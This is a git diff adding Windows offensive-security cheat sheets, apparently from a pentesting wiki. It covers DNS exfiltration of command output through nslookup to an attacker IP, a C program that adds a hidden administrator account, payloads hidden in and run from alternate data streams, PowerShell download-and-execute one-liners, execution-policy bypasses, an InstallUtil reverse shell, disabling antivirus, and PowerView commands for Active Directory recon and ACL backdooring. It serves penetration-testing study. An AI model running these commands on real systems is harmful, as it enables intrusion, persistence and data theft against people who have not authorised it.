+for /f "tokens=1,2,3" %a in ('dir /B "C:\Program Files (x86)"') do nslookup %a.%b.%c <IP_kali> #List that folder
+for /f "tokens=1,2,3" %a in ('dir /B "C:\Progra~2"') do nslookup %a.%b.%c <IP_kali> #Same as last one
+#More complex commands
+for /f "tokens=1,2,3,4,5,6,7,8,9" %a in ('whoami /priv ^| findstr /i "enable"') do nslookup %a.%b.%c.%d.%e.%f.%g.%h.%i <IP_kali> #Same as last one
+```
+
+You can also **redirect** the output, and then **read** it.
+
+```text
+whoami /priv | finstr "Enab" > C:\Users\Public\Documents\out.txt
+for /f "tokens=1,2,3,4,5,6,7,8,9" %a in ('type "C:\Users\Public\Documents\out.txt"') do nslookup %a.%b.%c.%d.%e.%f.%g.%h.%i <IP_kali>
+```
+
+## Calling CMD from C code
+
+```c
+#include <stdlib.h>     /* system, NULL, EXIT_FAILURE */
+
+// When executed by Administrator this program will create a user and then add him to the administrators group
+// i686-w64-mingw32-gcc addmin.c -o addmin.exe
+// upx -9 addmin.exe
+
+int main (){
+    int i;
+    i=system("net users otherAcc 0TherAcc! /add");
+    i=system("net localgroup administrators otherAcc /add");
+    return 0;
+}
+```
+
+## Alternate Streams CheatSheet
+
+Taken from [https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f](https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f)
+
+```bash
+###Add content to ADS###
+type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"
+extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe
+findstr /V /L W3AllLov3DonaldTrump c:\ADS\procexp.exe > c:\ADS\file.txt:procexp.exe
+certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt
+makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab
+print /D:c:\ads\file.txt:autoruns.exe c:\ads\Autoruns.exe
+reg export HKLM\SOFTWARE\Microsoft\Evilreg c:\ads\file.txt:evilreg.reg
+regedit /E c:\ads\file.txt:regfile.reg HKEY_CURRENT_USER\MyCustomRegKey
+expand \\webdav\folder\file.bat c:\ADS\file.txt:file.bat
+esentutl.exe /y C:\ADS\autoruns.exe /d c:\ADS\file.txt:autoruns.exe /o
+powershell -command " & {(Get-Content C:\ADS\file.exe -Raw | Set-Content C:\ADS\file.txt -Stream file.exe)}"
+curl file://c:/temp/autoruns.exe --output c:\temp\textfile1.txt:auto.exe
+cmd.exe /c echo regsvr32.exe ^/s ^/u ^/i:https://evilsite.com/RegSvr32.sct   ^scrobj.dll > fakefile.doc:reg32.bat
+
+###Extract content from ADS###
+expand c:\ads\file.txt:test.exe c:\temp\evil.exe
+esentutl.exe /Y C:\temp\file.txt:test.exe /d c:\temp\evil.exe /o
+
+###Executing the ADS content###
+
+* WMIC
+wmic process call create '"C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"'
+
+* Rundll32
+rundll32 "C:\Program Files (x86)\TeamViewer\TeamViewer13_Logfile.log:ADSDLL.dll",DllMain
+rundll32.exe advpack.dll,RegisterOCX not_a_dll.txt:test.dll
+rundll32.exe ieadvpack.dll,RegisterOCX not_a_dll.txt:test.dll
+
+* Cscript
+cscript "C:\Program Files (x86)\TeamViewer\TeamViewer13_Logfile.log:Script.vbs"
+
+* Wscript
+wscript c:\ads\file.txt:script.vbs
+echo GetObject("script:https://raw.githubusercontent.com/sailay1996/misc-bin/master/calc.js") > %temp%\test.txt:hi.js && wscript.exe %temp%\test.txt:hi.js
+
+* Forfiles
+forfiles /p c:\windows\system32 /m notepad.exe /c "c:\temp\shellloader.dll:bginfo.exe"
+
+* Mavinject.exe
+c:\windows\SysWOW64\notepad.exe
+tasklist | findstr notepad
+notepad.exe                   4172 31C5CE94259D4006           2     18,476 K
+type c:\temp\AtomicTest.dll > "c:\Program Files (x86)\TeamViewer\TeamViewer13_Logfile.log:Atomic.dll"
+c:\windows\WinSxS\wow64_microsoft-windows-appmanagement-appvwow_31bf3856ad364e35_10.0.16299.15_none_e07aa28c97ebfa48\mavinject.exe 4172 /INJECTRUNNING "c:\Program Files (x86)\TeamViewer\TeamViewer13_Logfile.log:Atomic.dll"
+
+* MSHTA
+mshta "C:\Program Files (x86)\TeamViewer\TeamViewer13_Logfile.log:helloworld.hta"
+(Does not work on Windows 10 1903 and newer)
+
+* Control.exe
+control.exe c:\windows\tasks\zzz:notepad_reflective_x64.dll
+https://twitter.com/bohops/status/954466315913310209
+
+* Create service and run
+sc create evilservice binPath= "\"c:\ADS\file.txt:cmd.exe\" /c echo works > \"c:\ADS\works.txt\"" DisplayName= "evilservice" start= auto
+sc start evilservice
+https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/
+
+* Powershell.exe
+powershell -ep bypass - < c:\temp:ttt
+
+* Powershell.exe
+powershell -command " & {(Get-Content C:\ADS\1.txt -Stream file.exe -Raw | Set-Content c:\ADS\file.exe) | start-process c:\ADS\file.exe}"
+
+* Powershell.exe
+Invoke-CimMethod -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine = C:\ads\folder:file.exe}
+
+* Regedit.exe
+regedit c:\ads\file.txt:regfile.reg
+
+* Bitsadmin.exe
+bitsadmin /create myfile
+bitsadmin /addfile myfile c:\windows\system32\notepad.exe c:\data\playfolder\notepad.exe
+bitsadmin /SetNotifyCmdLine myfile c:\ADS\1.txt:cmd.exe NULL
+bitsadmin /RESUME myfile
+
+* AppVLP.exe
+AppVLP.exe c:\windows\tracing\test.txt:ha.exe
+
+* Cmd.exe
+cmd.exe - < fakefile.doc:reg32.bat
+https://twitter.com/yeyint_mth/status/1143824979139579904
+
+* Ftp.exe
+ftp -s:fakefile.txt:aaaa.txt
+https://github.com/sailay1996/misc-bin/blob/master/ads.md
+
+* ieframe.dll , shdocvw.dll (ads)
+echo [internetshortcut] > fake.txt:test.txt && echo url=C:\windows\system32\calc.exe >> fake.txt:test.txt rundll32.exe ieframe.dll,OpenURL C:\temp\ads\fake.txt:test.txt
+rundll32.exe shdocvw.dll,OpenURL C:\temp\ads\fake.txt:test.txt
+https://github.com/sailay1996/misc-bin/blob/master/ads.md
+
+* bash.exe
+echo calc > fakefile.txt:payload.sh && bash < fakefile.txt:payload.sh
+bash.exe -c $(fakefile.txt:payload.sh)
+https://github.com/sailay1996/misc-bin/blob/master/ads.md
+
+* Regsvr32
+type c:\Windows\System32\scrobj.dll > Textfile.txt:LoveADS
+regsvr32 /s /u /i:https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Regsvr32_calc.sct Textfile.txt:LoveADS
+```
+
diff --git a/windows/basic-powershell-for-pentesters/README.md b/windows/basic-powershell-for-pentesters/README.md
new file mode 100644
index 00000000..b5713363
--- /dev/null
+++ b/windows/basic-powershell-for-pentesters/README.md
@@ -0,0 +1,266 @@
+# Basic PowerShell for Pentesters
+
+## Basic PS commands to start
+
+```bash
+Get-Help * #List everything loaded
+Get-Help process #List everything containing "process"
+Get-Help Get-Item -Full #Get full helpabout a topic
+Get-Help Get-Item -Examples #List examples
+Import-Module <modulepath>
+Get-Command -Module <modulename>
+```
+
+## Download & Execute
+
+```bash
+powershell "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.9:8000/ipw.ps1')"
+echo IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.13:8000/PowerUp.ps1') | powershell -noprofile - #From cmd download and execute
+powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://10.2.0.5/shell.ps1')|iex"
+iex (iwr '10.10.14.9:8000/ipw.ps1') #From PSv3
+
+$h=New-Object -ComObject Msxml2.XMLHTTP;$h.open('GET','http://10.10.14.9:8000/ipw.ps1',$false);$h.send();iex $h.responseText
+$wr = [System.NET.WebRequest]::Create("http://10.10.14.9:8000/ipw.ps1") $r = $wr.GetResponse() IEX ([System.IO.StreamReader]($r.GetResponseStream())).ReadToEnd(
+```
+
+### Using b64 from linux
+
+```bash
+echo -n "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.31/shell.ps1')" | iconv -t UTF-16LE | base64 -w 0
+powershell -nop -enc <BASE64_ENCODED_PAYLOAD>
+```
+
+## Download
+
+```text
+(New-Object Net.WebClient).DownloadFile("http://10.10.14.2:80/taskkill.exe","C:\Windows\Temp\taskkill.exe")
+Invoke-WebRequest "http://10.10.14.2:80/taskkill.exe" -OutFile "taskkill.exe"
+wget "http://10.10.14.2/nc.bat.exe" -OutFile "C:\ProgramData\unifivideo\taskkill.exe"
+
+Import-Module BitsTransfer
+Start-BitsTransfer -Source $url -Destination $output
+#OR
+Start-BitsTransfer -Source $url -Destination $output -Asynchronous
+```
+
+## Base64 Kali & EncodedCommand
+
+```bash
+kali> echo -n "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.9:8000/9002.ps1')" | iconv --to-code UTF-16LE | base64 -w0
+PS> powershell -EncodedCommand <Base64>
+```
+
+## Execution Policy
+
+By default it is set to **restricted.** Main ways to bypass this policy:
+
+```text
+1º Just copy and paste inside the interactive PS console
+2º Read en Exec
+Get-Content .runme.ps1 | PowerShell.exe -noprofile -
+3º Read and Exec
+Get-Content .runme.ps1 | Invoke-Expression
+4º Use other execution policy
+PowerShell.exe -ExecutionPolicy Bypass -File .runme.ps1
+5º Change users execution policy
+Set-Executionpolicy -Scope CurrentUser -ExecutionPolicy UnRestricted
+6º Change execution policy for this session
+Set-ExecutionPolicy Bypass -Scope Process
+7º Download and execute:
+powershell -nop -c "iex(New-Object Net.WebClient).DownloadString('http://bit.ly/1kEgbuH')"
+8º Use command switch
+Powershell -command "Write-Host 'My voice is my passport, verify me.'"
+9º Use EncodeCommand
+$command = "Write-Host 'My voice is my passport, verify me.'" $bytes = [System.Text.Encoding]::Unicode.GetBytes($command) $encodedCommand = [Convert]::ToBase64String($bytes) powershell.exe -EncodedCommand $encodedCommand
+```
+
+More can be found [here](https://blog.netspi.com/15-ways-to-bypass-the-powershell-execution-policy/)
+
+## Constrained language
+
+```bash
+$ExecutionContext.SessionState.LanguageMode
+#Values could be: FullLanguage or ConstrainedLanguage
+```
+
+### Bypass
+
+```bash
+#Easy bypass
+Powershell -version 2
+```
+
+In current Windows that Bypass won't work but you can use[ **PSByPassCLM**](https://github.com/padovah4ck/PSByPassCLM). **To compile it you may need** **to** _**Add a Reference**_ -&gt; _Browse_ -&gt;_Browse_ -&gt; add _C:\Windows\Microsoft.NET\assembly\GAC\_MSIL\System.Management.Automation\v4.0\_3.0.0.0\_\_31bf3856ad364e35\System.Management.Automation.dll_  and **change the project to .Net4.5**.
+
+#### Direct bypass:
+
+```bash
+C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=true /revshell=true /U c:\temp\psby.exe
+```
+
+#### Reverse shell:
+
+```bash
+C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=true /revshell=true /rhost=10.10.13.206 /rport=443 /U c:\temp\psby.exe
+```
+
+## AppLockerPolicy
+
+```text
+Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections
+```
+
+## Enable WinRM \(Remote PS\)
+
+```bash
+enable-psremoting -force #This enables winrm
+
+## Change NetWorkConnection Category to Private
+#Requires -RunasAdministrator
+
+Get-NetConnectionProfile |
+  Where{ $_.NetWorkCategory -ne 'Private'} |
+  ForEach {
+    $_
+    $_|Set-NetConnectionProfile -NetWorkCategory Private -Confirm
+  }
+```
+
+## Antivirus
+
+```bash
+#Check status
+Get-MpComputerStatus
+#Disable
+Set-MpPreference -DisableRealtimeMonitoring $true
+```
+
+## PS-History
+
+```bash
+Get-Content C:\Users\<USERNAME>\AppData\Roaming\Microsoft\Windows\Powershell\PSReadline\ConsoleHost_history.txt
+```
+
+## OS version and HotFixes
+
+```bash
+[System.Environment]::OSVersion.Version #Current OS version
+Get-WmiObject -query 'select * from win32_quickfixengineering' | foreach {$_.hotfixid} #List all patches
+Get-Hotfix -description "Security update" #List only "Security Update" patches
+```
+
+## Environment
+
+```bash
+Get-ChildItem Env: | ft Key,Value #get all values
+$env:UserName @Get UserName value
+```
+
+## Other connected drives
+
+```bash
+Get-PSDrive | where {$_.Provider -like "Microsoft.PowerShell.Core\FileSystem"}| ft Name,Root
+```
+
+### Recycle Bin
+
+```bash
+$shell = New-Object -com shell.application
+$rb = $shell.Namespace(10)
+$rb.Items()
+```
+
+[https://jdhitsolutions.com/blog/powershell/7024/managing-the-recycle-bin-with-powershell/](https://jdhitsolutions.com/blog/powershell/7024/managing-the-recycle-bin-with-powershell/)
+
+## Domain Recon
+
+[**Check this page about PowerView**](powerview.md)\*\*\*\*
+
+## Users
+
+```bash
+Get-LocalUser | ft Name,Enabled,Description,LastLogon
+Get-ChildItem C:\Users -Force | select Name
+```
+
+## SUDO
+
+```bash
+#CREATE A CREDENTIAL OBJECT
+$pass = ConvertTo-SecureString '<PASSWORD>' -AsPlainText -Force
+$cred = New-Object System.Management.Automation.PSCredential("<USERNAME>", $pass)
+#CHECK IF CREDENTIALS ARE WORKING EXECUTING whoami (expected: username of the credentials user)
+Invoke-Command -Computer ARKHAM -ScriptBlock { whoami } -Credential $cred
+#DOWNLOAD nc.exe
+Invoke-Command -Computer ARKHAM -ScriptBlock { IWR -uri 10.10.14.17/nc.exe -outfile nc.exe } -credential $cred
+
+
+Start-Process powershell -Credential $pp -ArgumentList '-noprofile -command &{Start-Process C:\xyz\nc.bat -verb Runas}'
+```
+
+## Groups
+
+```text
+Get-LocalGroup | ft Name #All groups
+Get-LocalGroupMember Administrators | ft Name, PrincipalSource #Members of Administrators
+```
+
+## Clipboard
+
+```text
+Get-Clipboard
+```
+
+## Processes
+
+```text
+Get-Process | where {$_.ProcessName -notlike "svchost*"} | ft ProcessName, Id
+```
+
+## Services
+
+```text
+Get-Service
+```
+
+## Password from secure string
+
+```text
+$pw=gc admin-pass.xml | convertto-securestring #Get the securestring from the file
+$cred=new-object system.management.automation.pscredential("administrator", $pw)
+$cred.getnetworkcredential() | fl * #Get plaintext password
+```
+
+## Network
+
+### Interfaces
+
+```text
+Get-NetIPConfiguration | ft InterfaceAlias,InterfaceDescription,IPv4Address
+Get-DnsClientServerAddress -AddressFamily IPv4 | ft
+```
+
+### Route
+
+```text
+route print
+```
+
+### ARP
+
+```text
+Get-NetNeighbor -AddressFamily IPv4 | ft ifIndex,IPAddress,LinkLayerAddress,State
+```
+
+### Hosts
+
+```text
+Get-Content C:\WINDOWS\System32\drivers\etc\hosts
+```
+
+### SNMP
+
+```text
+Get-ChildItem -path HKLM:\SYSTEM\CurrentControlSet\Services\SNMP -Recurse
+```
+
diff --git a/windows/basic-powershell-for-pentesters/powerview.md b/windows/basic-powershell-for-pentesters/powerview.md
new file mode 100644
index 00000000..14613abc
--- /dev/null
+++ b/windows/basic-powershell-for-pentesters/powerview.md
@@ -0,0 +1,247 @@
+# PowerView
+
+The most up-to-date version of PowerView will always be in the dev branch of PowerSploit: [https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1](https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1)
+
+### Quick enumeration
+
+```bash
+Get-NetDomain #Basic domain info
+#User info
+Get-NetUser -UACFilter NOT_ACCOUNTDISABLE | select samaccountname, description, pwdlastset, logoncount, badpwdcount #Basic user enabled info
+Get-NetUser -LDAPFilter '(sidHistory=*)' #Find users with sidHistory set
+Get-NetUser -PreauthNotRequired #ASREPRoastable users
+Get-NetUser -SPN #Kerberoastable users
+#Groups info
+Get-NetGroup | select samaccountname, admincount, description
+Get-DomainObjectAcl -SearchBase 'CN=AdminSDHolder,CN=System,DC=EGOTISTICAL-BANK,DC=local' | %{ $_.SecurityIdentifier } | Convert-SidToName #Get AdminSDHolders
+#Computers
+Get-NetComputer | select samaccountname, operatingsystem
+Get-NetComputer -Unconstrained | select samaccountname #DCs always appear but aren't useful for privesc
+Get-NetComputer -TrustedToAuth | select samaccountname #Find computers with Constrined Delegation
+Get-DomainGroup -AdminCount | Get-DomainGroupMember -Recurse | ?{$_.MemberName -like '*$'} #Find any machine accounts in privileged groups
+#Shares
+Find-DomainShare -CheckShareAccess #Search readable shares
+#Domain trusts
+Get-NetDomainTrust #Get all domain trusts (parent, children and external)
+Get-NetForestDomain | Get-NetDomainTrust #Enumerate all the trusts of all the domains found
+#LHF
+#Check if any user passwords are set
+$FormatEnumerationLimit=-1;Get-DomainUser -LDAPFilter '(userPassword=*)' -Properties samaccountname,memberof,userPassword | % {Add-Member -InputObject $_ NoteProperty 'Password' "$([System.Text.Encoding]::ASCII.GetString($_.userPassword))" -PassThru} | fl
+#Asks DC for all computers, and asks every compute if it has admin access (very noisy). You need RCP and SMB ports opened.
+Find-LocalAdminAccess
+#Get members from Domain Admins (default) and a list of computers and check if any of the users is logged in any machine running Get-NetSession/Get-NetLoggedon on each host. If -Checkaccess, then it also check for LocalAdmin access in the hosts.
+Invoke-UserHunter -CheckAccess
+#Find interesting ACLs
+Invoke-ACLScanner -ResolveGUIDs | select IdentityReferenceName, ObjectDN, ActiveDirectoryRights | fl
+```
+
+### Domain info
+
+```bash
+# Domain Info
+Get-NetDomain #Get info about the current domain
+Get-NetDomain -Domain mydomain.local
+Get-DomainSID #Get domain SID
+
+## Policy
+Get-DomainPolicy #Get info about the policy
+(Get-DomainPolicy)."KerberosPolicy" #Kerberos tickets info(MaxServiceAge)
+(Get-DomainPolicy)."System Access" #Password policy
+(Get-DomainPolicy).PrivilegeRights #Check your privileges
+
+## Domain Controller
+Get-NetDomainController -Domain mydomain.local #Get Domain Controller
+```
+
+### Users, Groups and Computers
+
+```bash
+# Users
+Get-NetUser #Get users with several (not all) properties
+Get-NetUser | select -ExpandProperty samaccountname #List all usernames
+Get-NetUser -UserName student107 #Get info about a user
+Get-NetUser -properties name, description #Get all descriptions
+Get-NetUser -properties name, pwdlastset, logoncount, badpwdcount  #Get all pwdlastset, logoncount and badpwdcount
+Find-UserField -SearchField Description -SearchTerm "built" #Search account with "something" in a parameter
+
+## Users Filters
+Get-NetUser -UACFilter NOT_ACCOUNTDISABLE -properties distinguishedname #All enabled users
+Get-NetUser -UACFilter ACCOUNTDISABLE #All disabled users
+Get-NetUser -UACFilter SMARTCARD_REQUIRED #Users that require a smart card
+Get-NetUser -UACFilter NOT_SMARTCARD_REQUIRED -Properties samaccountname #Not smart card users
+Get-NetUser -LDAPFilter '(sidHistory=*)' #Find users with sidHistory set
+Get-NetUser -PreauthNotRequired #ASREPRoastable users
+Get-NetUser -SPN | select serviceprincipalname #Kerberoastable users
+Get-NetUser -SPN | ?{$_.memberof -match 'Domain Admins'} #Domain admins kerberostable
+Get-Netuser -TrustedToAuth #Useful for Kerberos constrain delegation
+Get-NetUser -AllowDelegation -AdminCount #All privileged users that aren't marked as sensitive/not for delegation
+# retrieve *most* users who can perform DC replication for dev.testlab.local (i.e. DCsync)
+Get-ObjectAcl "dc=dev,dc=testlab,dc=local" -ResolveGUIDs | ? {
+    ($_.ObjectType -match 'replication-get') -or ($_.ActiveDirectoryRights -match 'GenericAll')
+}
+
+#Groups
+Get-NetGroup #Get groups
+Get-NetGroup -Domain mydomain.local #Get groups of an specific domain
+Get-NetGroup 'Domain Admins' #Get all data of a group
+Get-NetGroup -AdminCount #Search admin grups
+Get-NetGroup -UserName "myusername" #Get groups of a user
+Get-NetGroupMember -Identity "Administrators" -Recurse #Get users inside "Administrators" group. If there are groups inside of this grup, the -Recurse option will print the users inside the others groups also
+Get-NetGroupMember -Identity "Enterprise Admins" -Domain mydomain.local #Remember that "Enterprise Admins" group only exists in the rootdomain of the forest
+Get-NetLocalGroup -ComputerName dc.mydomain.local -ListGroups #Get Local groups of a machine (you need admin rights in no DC hosts)
+Get-NetLocalGroupMember -computername dcorp-dc.dollarcorp.moneycorp.local #Get users of localgroups in computer
+Get-DomainObjectAcl -SearchBase 'CN=AdminSDHolder,CN=System,DC=testlab,DC=local' -ResolveGUIDs #Check AdminSDHolder users
+Get-NetGPOGroup #Get restricted groups
+
+# Computers
+Get-NetComputer #Get all computer objects
+Get-NetComputer -Ping #Send a ping to check if the computers are working
+Get-NetComputer -Unconstrained #DCs always appear but aren't useful for privesc
+Get-NetComputer -TrustedToAuth #Find computers with Constrined Delegation
+Get-DomainGroup -AdminCount | Get-DomainGroupMember -Recurse | ?{$_.MemberName -like '*$'} #Find any machine accounts in privileged groups
+```
+
+### Logon and Sessions
+
+```bash
+Get-NetLoggedon -ComputerName <servername> #Get net logon users at the moment in a computer (need admins rights on target)
+Get-NetSession -ComputerName <servername> #Get active sessions on the host
+Get-LoggedOnLocal -ComputerName <servername> #Get locally logon users at the moment (need remote registry (default in server OS))
+Get-LastLoggedon -ComputerName <servername> #Get last user logged on (needs admin rigths in host)
+Get-NetRDPSession -ComputerName <servername> #List RDP sessions inside a host (needs admin rights in host)
+```
+
+### Shared files and folders
+
+```bash
+Get-NetFileServer #Search file servers. Lot of users use to be logged in this kind of servers
+Find-DomainShare -CheckShareAccess #Search readable shares
+Find-InterestingDomainShareFile #Find interesting files, can use filters
+```
+
+### GPOs & OUs
+
+```bash
+#GPO
+Get-NetGPO #Get all policies with details
+Get-NetGPO | select displayname #Get the names of the policies
+Get-NetGPO -ComputerName <servername> #Get the policy applied in a computer
+gpresult /V #Get current policy
+# Enumerate permissions for GPOs where users with RIDs of > -1000 have some kind of modification/control rights
+Get-DomainObjectAcl -LDAPFilter '(objectCategory=groupPolicyContainer)' | ? { ($_.SecurityIdentifier -match '^S-1-5-.*-[1-9]\d{3,}$') -and ($_.ActiveDirectoryRights -match 'WriteProperty|GenericAll|GenericWrite|WriteDacl|WriteOwner')}
+Get-NetGPO -GPOName '{3E04167E-C2B6-4A9A-8FB7-C811158DC97C}' #Get GPO of an OU
+
+#OU
+Get-NetOU #Get Organization Units
+Get-NetOU StudentMachines | %{Get-NetComputer -ADSPath $_} #Get all computers inside an OU (StudentMachines in this case)
+```
+
+### ACL
+
+```bash
+Get-ObjectAcl -SamAccountName <username> -ResolveGUIDs #Get ACLs of an object (permissions of other objects over the indicated one)
+Get-PathAcl -Path "\\dc.mydomain.local\sysvol" #Get permissions of a file
+Find-InterestingDomainAcl -ResolveGUIDs #Find intresting ACEs (Interesting permisions of "unexpected objects" (RID>1000 and modify permissions) over other objects
+Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.IdentityReference -match "RDPUsers"} #Check if any of the interesting permissions founds is realated to a username/group
+Get-NetGroupMember -GroupName "Administrators" -Recurse | ?{$_.IsGroup -match "false"} | %{Get-ObjectACL -SamAccountName $_.MemberName -ResolveGUIDs} | select ObjectDN, IdentityReference, ActiveDirectoryRights #Get special rights over All administrators in domain
+```
+
+### Domain Trust
+
+```bash
+Get-NetDomainTrust #Get all domain trusts (parent, children and external)
+Get-NetForestDomain | Get-NetDomainTrust #Enumerate all the trusts of all the domains found
+Get-DomainTrustMapping #Enumerate also all the trusts
+
+Get-ForestGlobalCatalog #Get info of current forest (no external)
+Get-ForestGlobalCatalog -Forest external.domain #Get info about the external forest (if possible)
+Get-DomainTrust -SearchBase "GC://$($ENV:USERDNSDOMAIN)" 
+
+Get-NetForestTrust #Get forest trusts (it must be between 2 roots, trust between a child and a root is just an external trust)
+
+Get-DomainForeingUser #Get users with privileges in other domains inside the forest
+Get-DomainForeignGroupMember #Get groups with privileges in other domains inside the forest
+```
+
+###  L**ow**-**hanging fruit**
+
+```bash
+#Check if any user passwords are set
+$FormatEnumerationLimit=-1;Get-DomainUser -LDAPFilter '(userPassword=*)' -Properties samaccountname,memberof,userPassword | % {Add-Member -InputObject $_ NoteProperty 'Password' "$([System.Text.Encoding]::ASCII.GetString($_.userPassword))" -PassThru} | fl
+#Asks DC for all computers, and asks every compute if it has admin access (very noisy). You need RCP and SMB ports opened.
+Find-LocalAdminAccess
+#(This time you need to give the list of computers in the domain) Do the same as before but trying to execute a WMI action in each computer (admin privs are needed to do so). Useful if RCP and SMB ports are closed.
+.\Find-WMILocalAdminAccess.ps1 -ComputerFile .\computers.txt
+#Enumerate machines where a particular user/group identity has local admin rights
+Get-DomainGPOUserLocalGroupMapping -Identity <User/Group>
+#Goes through the list of all computers (from DC) and executes Get-NetLocalGroup to search local admins (you need root privileges on non-dc hosts).
+Invoke-EnumerateLocalAdmin
+#Search unconstrained delegation computers and show users
+Find-DomainUserLocation -ComputerUnconstrained -ShowAll
+#Admin users that allow delegation, logged into servers that allow unconstrained delegation
+Find-DomainUserLocation -ComputerUnconstrained -UserAdminCount -UserAllowDelegation
+#Get members from Domain Admins (default) and a list of computers and check if any of the users is logged in any machine running Get-NetSession/Get-NetLoggedon on each host. If -Checkaccess, then it also check for LocalAdmin access in the hosts.
+Invoke-UserHunter [-CheckAccess]
+#Search "RDPUsers" users
+Invoke-UserHunter -GroupName "RDPUsers"
+#It will only search for active users inside high traffic servers (DC, File Servers and Distributed File servers)
+Invoke-UserHunter -Stealth
+```
+
+### Deleted objects
+
+```bash
+#This isn't a powerview command, it's a feature from the AD management powershell module of Microsoft
+#You need to be in the AD Recycle Bin group of the AD to list the deleted AD objects
+Get-ADObject -filter 'isDeleted -eq $true' -includeDeletedObjects -Properties *
+```
+
+### MISC
+
+#### SID to Name
+
+```bash
+"S-1-5-21-1874506631-3219952063-538504511-2136" | Convert-SidToName
+```
+
+#### Kerberoast
+
+```bash
+Invoke-Kerberoast [-Identity websvc] #Without "-Identity" kerberoast all possible users
+```
+
+#### Use different credentials \(argument\)
+
+```bash
+# use an alterate creadential for any function
+$SecPassword = ConvertTo-SecureString 'BurgerBurgerBurger!' -AsPlainText -Force
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-DomainUser -Credential $Cred
+```
+
+#### Impersonate a user
+
+```bash
+# if running in -sta mode, impersonate another credential a la "runas /netonly"
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Invoke-UserImpersonation -Credential $Cred
+# ... action
+Invoke-RevertToSelf
+```
+
+#### Set values
+
+```bash
+# set the specified property for the given user identity
+Set-DomainObject testuser -Set @{'mstsinitialprogram'='\\EVIL\program.exe'} -Verbose
+# Set the owner of 'dfm' in the current domain to 'harmj0y'
+Set-DomainObjectOwner -Identity dfm -OwnerIdentity harmj0y
+# ackdoor the ACLs of all privileged accounts with the 'matt' account through AdminSDHolder abuse
+Add-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System,DC=testlab,DC=local' -PrincipalIdentity matt -Rights All
+# Add user to 'Domain Admins'
+Add-NetGroupUser -Username username -GroupName 'Domain Admins' -Domain my.domain.local
+```
+
+
+
diff --git a/windows/checklist-windows-privilege-escalation.md b/windows/checklist-windows-privilege-escalation.md
new file mode 100644
index 00000000..cafc13d8
--- /dev/null
+++ b/windows/checklist-windows-privilege-escalation.md
@@ -0,0 +1,94 @@
+# Checklist - Local Windows Privilege Escalation
+
+### **Best tool to look for Windows local privilege escalation vectors:** [**WinPEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS)\*\*\*\*
+
+### [Vulnerable Kernel?](windows-local-privilege-escalation/#kernel-exploits)
+
+* [ ] Search for kernel **exploits using scripts** \(_post/windows/gather/enum\_patches, post/multi/recon/local\_exploit\_suggester, sherlock, watson_ \)
+* [ ] Use **Google to search** for kernel **exploits**
+* [ ] Use **searchsploit to search** for kernel **exploits**
+* [ ] Any [**vulnerable Driver**](windows-local-privilege-escalation/#vulnerable-drivers)?
+
+### [Logging/AV enumeration](windows-local-privilege-escalation/#enumeration)
+
+* [ ] Check for **credentials** in[ **environment variables**](windows-local-privilege-escalation/#environment)\*\*\*\*
+* [ ] Check [**LAPS**](windows-local-privilege-escalation/#laps)\*\*\*\*
+* [ ] Check [**Audit** ](windows-local-privilege-escalation/#audit-settings)and [**WEF** ](windows-local-privilege-escalation/#wef)settings
+* [ ] Check if any [**AV**](windows-local-privilege-escalation/#av)\*\*\*\*
+
+### \*\*\*\*[**User Privileges**](windows-local-privilege-escalation/#users-and-groups)
+
+* [ ] Check [**current** user **privileges**](windows-local-privilege-escalation/#users-and-groups)\*\*\*\*
+* [ ] Check if you have [any of these tokens enabled](windows-local-privilege-escalation/#token-manipulation): **SeImpersonatePrivilege, SeAssignPrimaryPrivilege, SeTcbPrivilege, SeBackupPrivilege, SeRestorePrivilege, SeCreateTokenPrivilege, SeLoadDriverPrivilege, SeTakeOwnershipPrivilege, SeDebugPrivilege** ? 
+* [ ] What is[ inside the Clipboard](windows-local-privilege-escalation/#get-the-content-of-the-clipboard)?
+
+### [Network](windows-local-privilege-escalation/#network)
+
+* [ ] Check **current** [network **information**](windows-local-privilege-escalation/#network)\*\*\*\*
+* [ ] Check **hidden local services** restricted to the outside
+
+### Vulnerable [Software ](windows-local-privilege-escalation/#software)or [Processes](windows-local-privilege-escalation/#running-processes)?
+
+* [ ] Is any **unknown software running**?
+* [ ] Is any software with **more privileges that it should have running**?
+* [ ] Search for **exploits for running processes** \(specially if running of versions\)
+* [ ] Can you **read any** interesting **process memory** \(where passwords could be saved\)?
+* [ ] Have **write permissions** over the **binaries been** executed by the **processes**?
+* [ ] Have **write permissions** over the **folder** of a binary been executed to perform a **DLL Hijacking**?
+* [ ] What is[ **running** on **startup** or is **scheduled**](windows-local-privilege-escalation/#run-at-startup)? Can you **modify** the binary?
